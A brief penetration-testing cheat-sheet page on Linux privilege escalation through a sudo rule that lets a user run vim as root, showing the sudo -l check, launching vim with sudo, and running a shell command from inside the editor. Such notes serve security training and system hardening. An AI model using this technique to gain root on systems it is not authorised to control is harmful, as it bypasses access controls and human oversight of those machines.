Sudo Vim Privilege Escalation

Sudo vim command might be vulnerable to privilege escalation (PrivEsc).

sudo -l

(ALL) NOPASSWD: vim example.txt
Copied!

If we can execute "vim" command as root, we can execute the shell command in the vim editor.

Simply run "vim" command as root.

sudo vim example.txt
Copied!

In Vim editor, we can run shell commands as root.

:r!whoami

Last updated 1 year ago